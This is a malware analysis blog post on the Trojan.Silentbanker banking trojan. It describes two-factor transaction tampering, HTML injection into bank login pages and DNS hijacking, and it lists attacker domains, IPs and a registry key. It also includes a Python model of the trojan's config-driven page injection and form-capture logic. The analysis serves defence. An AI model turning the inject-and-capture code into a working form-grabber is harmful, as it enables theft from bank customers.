Security Response

Banking in Silence

Created: 14 Jan 2008 08:00:00 GMT • Updated: 23 Jan 2014 18:43:03 GMT
By Liam O Murchu

Targeting over 400 banks (including my own :( !) and having the ability to circumvent two-factor authentication are just two of the features that push Trojan.Silentbanker into the limelight. The scale and sophistication of this emerging banking Trojan is worrying, even for someone who sees banking Trojans on a daily basis.

This Trojan downloads a configuration file that contains the domain names of over 400 banks. Not only are the usual large American banks targeted, but banks in many other countries are targeted as well, including France, Spain, Ireland, the UK, Finland and Turkey; the list goes on.

The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying. The Trojan can intercept transactions that require two-factor authentication and silently change the user-entered destination bank account details to the attacker's account details. The Trojan ensures that the user does not notice this change by presenting the user with the details they expect to see, while all the time sending the bank the attacker's details instead. Since the user notices nothing wrong with the transaction, they enter the second authentication password, in effect handing over their money to the attackers. The Trojan intercepts all of this traffic before it is encrypted, so even if the transaction takes place over SSL the attack is still valid: SSL protects the data in transit, not the form data before the browser encrypts it. Unfortunately, we were unable to reproduce exactly such a transaction in the lab. However, analysis of the Trojan's code shows that this feature is available to the attackers.

The Trojan does not use this attack vector for all banks, however. It only takes this route when an easier one is not available. If a transaction at the targeted bank can be made using just a username and password, the Trojan takes that information; if a certificate is also required, the Trojan can steal that too; if cookies are required, the Trojan steals those. Even if the attacker is missing a piece of information needed to conduct a transaction, extra HTML can be added to the page to ask the user for it. (In the example below the user is asked to enter their encryption key in addition to the regular information.)

Here is the login form viewed on a clean machine:

Below is the form presented to an infected user; the input box added by the Trojan has been marked in red:

When instructed, the Trojan can also redirect users to an attacker-controlled server instead of the real bank in order to perform a classic man-in-the-middle attack. Currently only one bank is targeted in this way; however, recent updates to the Trojan change the user's DNS settings to point to an attacker-controlled server. Using this technique the Trojan can start redirecting any site to an attacker site at any time. This feature also means that if the Trojan is removed but the DNS settings are left unchanged, the user may still be at risk. (See below for the attackers' DNS server addresses.)

Add to all of the above the ability to steal FTP, POP, Web mail, protected storage, and cached passwords, and we start to see the capabilities of this Trojan. But it doesn't stop there: don't forget the porn! The Trojan also contains over 600 pornographic Web site URLs that can be shown to the infected user so that the attacker can make money from the referrals.

Lastly, the Trojan can also download updates, which it regularly does. It can also download other executables, and it can use the infected machine as a proxy or as a Web server on any chosen port (in tests the HTTP port used was 18102).

The multiple configuration files that the Trojan downloads are updated several times per day, and currently the Trojan is capable of injecting HTML into about 200 different URLs. The configuration files are compressed and encrypted; however, after decrypting them we can see how the Trojan works in more detail.

The configuration files are structured as .ini files, and each section of an .ini file represents a different task. Here is a snippet from the configuration file that was used to inject HTML into the banking form shown in the example above:

[jhw21]
pok=insert
qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
njd=name="oppasswd;
dfr=14
xzn=/>n
xzq=2
rek=<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
req=166

The configuration options in the snippet above are as follows (the remaining tokens, dfr, xzq and req, are not described here):

Token   Purpose
pok     Action to take
qas     URL to take action on
njd     String to search for
xzn     End string to search for
rek     HTML to insert

The Trojan searches the page for the string name="oppasswd, then for the end tag /> that follows it, and inserts the HTML immediately after that tag:

<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>

Below is the HTML as served to the user on a non-infected computer:

<label for="clave">Clave personal: </label>
<input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
</div>

And on an infected computer:

<label for="clave">Clave personal: </label>
<input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
</div>

The Trojan can take any of the following actions when altering the HTML of a page: insert, delete, replace, and replace all. The Trojan uses the field name "ESpass" (see the form above) as a marker: when the user submits a page to the bank, the Trojan checks whether the submitted data contains that name. In this way it recognizes pages it has altered, extracts the relevant data from them, and sends it to the attacker as well as to the bank.
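The following Python model, added here as an illustration and not code from the Trojan or from Symantec, reproduces the injection step from the configuration snippet above and the marker check on the outgoing submission. It assumes that the ";" after oppasswd and the "n" after /> in the snippet are separators or extraction artifacts, that lines of a multi-line HTML value are recognised by not starting with one of the known tokens, that qas is matched against host plus path of the requested URL, and that the submission is a URL-encoded form body; the unexplained tokens are parsed but not used. The config and pages are constructed copies of the post's own material.

```python
"""Model of Silentbanker's config-driven HTML injection (added illustration)."""
import re
from urllib.parse import parse_qs, urlsplit

# Tokens the post documents (pok, qas, njd, xzn, rek) plus the ones it lists
# without explaining (dfr, xzq, req). Knowing the key names lets a multi-line
# HTML value be told apart from a new key: the line `class="input01 aleft w180"/>`
# contains "=" but is not a key (assumption about the format).
KNOWN_KEYS = ("pok", "qas", "njd", "dfr", "xzn", "xzq", "rek", "req")
_KEY_RE = re.compile(r"^(%s)=(.*)$" % "|".join(KNOWN_KEYS))

# Constructed copy of the post's snippet, with the assumed artifacts removed.
CONFIG_TEXT = '''[jhw21]
pok=insert
qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
njd=name="oppasswd
dfr=14
xzn=/>
xzq=2
rek=<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
req=166'''

# Constructed copy of the clean page fragment shown in the post.
CLEAN_PAGE = '''<label for="clave">Clave personal: </label>
<input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
</div>'''

# Marker field the Trojan looks for in submitted data (from the post).
KEYWORD = "ESpass"


def parse_config(text):
    """Parse the .ini-style configuration into {section: {key: value}}.
    Lines that do not start with a known key continue the previous value."""
    sections, current, last_key = {}, None, None
    for line in text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1], {})
            last_key = None
            continue
        if current is None:
            continue
        m = _KEY_RE.match(line)
        if m:
            last_key = m.group(1)
            current[last_key] = m.group(2)
        elif last_key is not None:
            current[last_key] += "\n" + line
    return sections


def url_targeted(task, url):
    """qas carries no scheme, so compare it against host + path (assumption)."""
    parts = urlsplit(url)
    return task["qas"] in parts.netloc + parts.path


def apply_insert(task, page):
    """Insert rek right after the first xzn that follows njd. A page without
    both markers is returned unchanged, so unrecognised forms pass through."""
    start = page.find(task["njd"])
    if start < 0:
        return page
    end = page.find(task["xzn"], start)
    if end < 0:
        return page
    end += len(task["xzn"])
    return page[:end] + "\n" + task["rek"] + page[end:]


def rewrite_response(config, url, page):
    """Apply every 'insert' task whose qas matches the requested URL."""
    for task in config.values():
        if task.get("pok") == "insert" and url_targeted(task, url):
            page = apply_insert(task, page)
    return page


def capture_submission(body):
    """Examine a URL-encoded form body before encryption. If it carries the
    injected field name, the page was one the Trojan altered and the whole
    submission is worth keeping; otherwise return None."""
    fields = parse_qs(body, keep_blank_values=True)
    if KEYWORD not in fields:
        return None
    return {k: v[0] for k, v in fields.items()}


if __name__ == "__main__":
    cfg = parse_config(CONFIG_TEXT)
    url = "https://someBankSite.com/xpage/loginxxxxxxxxxs.htm"
    print(rewrite_response(cfg, url, CLEAN_PAGE))
    print(capture_submission("oppasswd=1234&ESpass=5678"))
```

Run stand-alone, the first print reproduces the infected-page HTML shown above line for line; the second shows that a submission containing the injected field is captured while an unaltered login (no ESpass field) is ignored.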

The configuration files for this Trojan currently contain over 200 KB of data; however, new URLs and HTML are being added to the configuration files on a daily basis. The Trojan is easily updated, since the full HTML of any banking-related Web site is sent to the attackers. Using these submissions they can target banks at which they do not already have accounts. We are currently monitoring all of the updates to this Trojan.

The Trojan accesses the following URLs for configuration, updates, and to send stolen data:

• iloveie.info
• webcounterstat.info
• microcbs.com
• reservaza.com
• screensaversfor-fun.com
• mystabcounter.info
• 85.255.119.218

The Trojan also downloads a copy of Trojan.Flush.J, which changes the user's DNS settings to the following attacker-controlled servers:

• 85.255.116.133
• 85.255.112.87

For protection, please keep your antivirus definitions up to date and block the above addresses at the firewall.

Note: Not only did this Trojan grab my attention for obvious reasons, but it also installed itself as a .midi driver, causing my music to stop! For the record, the Trojan adds itself under the following registry key so that it is loaded in all applications that use sound:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\"midi1"